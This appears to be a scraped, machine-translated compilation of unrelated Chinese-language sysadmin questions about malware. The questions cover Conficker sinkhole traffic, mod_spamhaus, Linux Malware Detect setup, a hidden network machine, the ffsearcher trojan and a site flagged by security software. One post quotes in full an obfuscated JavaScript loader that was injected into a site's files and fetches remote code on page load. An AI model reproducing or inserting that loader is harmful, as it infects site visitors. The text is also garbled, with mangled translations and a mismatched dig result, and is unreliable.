我们公司的一些电脑已经感染了蠕虫Conficker。 我们不知道感染的来源,但我想监测外部活动,看看我们是否仍然感染(我们已经“保护”了一些电脑)。 确保我可以要求不上市很重要。 我的问题是:这意味着我必须监视从我的源IP,和/或特定的stream量到具体IP的整个出站stream量,和/或基于端口的方式的出站stream量(来自每个端口的stream量一起与目标端口/ IP),远程(感染networking之外)的一切? 我不想在这里问一些检测受感染电脑的方法,而是将外部活动看作是“清洁”的间接证据。 您可以通过以下链接查看我们的IP和我们的感染说明: http://cbl.abuseat.org/lookup.cgi?ip=79.108.33.94&.pubmit=Lookup 目的IP是216.66.15.109。 如果我dig它: $ dig -x 79.108.33.94 109.64-26.15.66.216.in-addr.arpa. 3600 IN PTR sinkhole-iad1-1.cwg.fsi.io. 这里没有什么惊喜(明确指出是一个陷阱)。 我可以从家里(Ubuntu 14.04)探索,但是,如果我的ISP或路由器以某种方式阻止我,我可以SSH连接到我们公司的公共服务器(Ubuntu服务器14.04)从那里扫描。 所以,让我们假设我没有任何限制来进行这种扫描。
我们使用Apache2 mod_spamhaus,许多客户被禁止使用“Post”方法。 有没有办法否认mod_spamhaus不断禁止我们的客户做出假阳性或禁止客户只导致他们的ip是在一系列被禁止的ips? spamhaus.wl文件的语法是什么? 这是正确的写ips我们要白名单这样的文件? 例 122.0.0.1 127.0.0.2 N.
在运行./install .sh时,我得到… ln: failed to create symbolic link '/usr/local/sbin/maldet': No such file or directory ln: failed to create symbolic link '/usr/local/sbin/lmd': No such file or directory 然后, update-rc.d: warning: /etc/init.d/maldet missing LSB information 我假设在第二个错误的结果。 我见过的所有安装说明都没有预料到这一点。 问题 – 是否有解决办法,还是我需要find一个Ubuntu友好的替代服务器恶意软件程序?
我已经设置了Linux Malware Detect来向我发送它生成的报告的电子邮件,但是即使它已经产生了多个报告,也没有收到。 相关的maldet设置/usr/local/maldetect/conf.maldet包括: email_alert="1" email_addr="[email protected]" email_ignore_clean="0" 我也使用过这个命令: whereis mail 确保安装了“mail”命令并返回“/ etc / mail”来validation安装。 我需要做什么来接收来自maldet的电子邮件?
假设一个stream行的VPS提供商托pipe一个单独的网站与Nginx,Apache和WordPress / PHP的Ubuntu 14.04服务器设置,启动服务器后,它工作很好一段时间。 几天之后,VPS提供商将服务器显示为100%的CPU利用率,SSH访问不再可以连接(超时),网站变得无法访问。 在服务器达到100%的CPU利用率之前,可以通过SSH访问服务器而不会出现问题。 服务器上几乎没有任何负载会导致CPU使用 – 通常CPU使用的范围小于3%。 我怎样才能诊断哪个进程导致CPU使用突然飙升而不能进入shell? 目前,当发生这种情况时,服务器重新启动,然后再运行几天。 当然,虽然ClamAV没有发现任何潜在的病毒,但怀疑有病毒或其他恶意软件。
Maldet / Rfxn Linux MalDetect文档为此提供了一个电子邮件报告,即使没有发现任何内容: -e, –report SCANID email View scan report of most recent scan or of a specific SCANID and optionally e-mail the report to a supplied e-mail address eg: maldet –report eg: maldet –report list eg: maldet –report 050910-1534.21135 eg: maldet –report SCANID [email protected] 所有非常简单,但我不知道我怎么能通过一个电子邮件地址作为第二个参数在这里,同时允许第一个参数(扫描ID)回落到默认,所以maldet电子邮件无论最新的报告是这个定制电子邮件地址 我希望能够使用这个(例如在cron中)定期检查Maldet是否正在扫描,并能够按预期发送电子邮件报告。 我已经尝试maldet –report "" [email protected]基于在bash传递一个空的variables的标准方式 ,但它忽略它,并输出看起来像一个空的报告到控制台。 我也试过像maldet […]
在运行networking扫描的时候,我发现为Linux机器报告了开放的tcp端口(端口22-Openssh debian;端口5124/5127/7582/8282-隧道是OpenSSL),但是我们只有一个Linux机器,这不是它。 当我将mac地址追溯到物理盒子时,它会回到Server 2012 r2盒子。 但是,这个服务器上的MAC地址并不存在!? 它有两个MAC地址为00.1E.67.19.B5.34和00.1E.67.19.B5.35的物理适配器,但是被报告为linux的机器是00.1E.67.19.B5.36,它不存在物理上的存在。 DHCP向神秘机发出地址。 除了2012r2机器的控制台以外,我可以从networking上的任何地方ping通这台机器。 所以我真的很困惑,有些惊慌。 当我检查和扫描这个服务器时,我发现没有什么看起来错误,但是同时我找不到这个隐藏的机器。 我猜想有一个虚拟机在某种程度上运行隐藏。 现在这可能是一些根植的盒子还是有人知道其他软件会有这种效果? 任何提示发现和删除这台机器? 问候,布莱斯。
有没有人有任何消除ffsearcher木马的经验。 我们的一个系统被感染。 病毒扫描程序不检测,但我们的websense程序正在检测所有的互联网活动。 我试图确定如何删除这个。 这里是病毒的一个伟大的文章,但没有删除说明。 告诉被感染的文件,但不知道如何清理。 http://secureworks.com/research/threats/ffsearcher
我们最近注意到一个恶意脚本将自己插入到我们的域questoons.com上的许多PHP和HTML文件以及该帐户上托pipe的各种附加域。 该脚本将自身插入到文件末尾,代码如下所示: <script>/*CODE1*/ try{window.onload = function(){var Q236s4ic4454clw = document.createElement('script');Q236s4ic4454clw.setAttribute('type', 'text/javascript');Q236s4ic4454clw.setAttribute('id', 'myscript1');Q236s4ic4454clw.setAttribute('src', 'h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&)s)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!!^(p#!/@&)c^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$'.replace(/\(|\!|&|#|\$|\)|@|\^/ig, ''));Q236s4ic4454clw.setAttribute('defer', 'defer');document.body.appendChild(Q236s4ic4454clw);}} catch(e) {}</script> 请指导如何发生这种情况,我们如何能够阻止它的传播,并防止进一步的感染发生。 感谢和问候, 维纳亚克
我最近帮助build立了一个我正在帮助举办的会议的网站。 我们寄出了大约3万本小册子,预计在一两天内就会有大量的stream量涌现。 但是,我们不断从访问网站的人那里得到他们的安全软件标记为危险的报告。 我们非常担心我们的营销工作会受到严重伤害,因为我们的非技术用户会因为警告而被吓跑。 我们让我们的networking程序员检查网站,他报告说,这是完全安全的。 真的,这只是一个7静态html页面的集合,没有任何幻想。 最有可能的情况是这样的,因为这个域名在2周前才被注册,安全软件被devise来标记这样的年轻域名。 我们可以做什么?! 一位访问者写信给我们说:“我进入了电子邮件正文中的网站进行注册,Verizon将其标记为有病毒,不让我打开,然后手动input浏览器窗口,同样的东西发生“。 第二位用户写信给我们说:“刚才我去了http://www.lamindbodyconference.org/ ,我收到一条消息:”这个网站很可疑。 现在就离开,除非你知道这个网站是安全的。“当我问起警报起源的位置时,她回答说:”从我的浏览器,IE 8我尝试了Chrome(我没有Firefox),我不不要去那里。 该消息似乎来自Check Point软件技术有限公司 – 我认为这是我的Zone Alarm。 截图附件“截图显示了Checkpoint软件技术有限公司的黄色警报,没有包含用户未报告的任何其他信息。 我们的托pipe公司是Namecheap托pipe,具体的主机server8.namecheaphosting.com。 有没有人认为这可能是问题的一部分? 如果仅仅是最近才注册域名,那么我们能做些什么来补救或摆脱这些警告?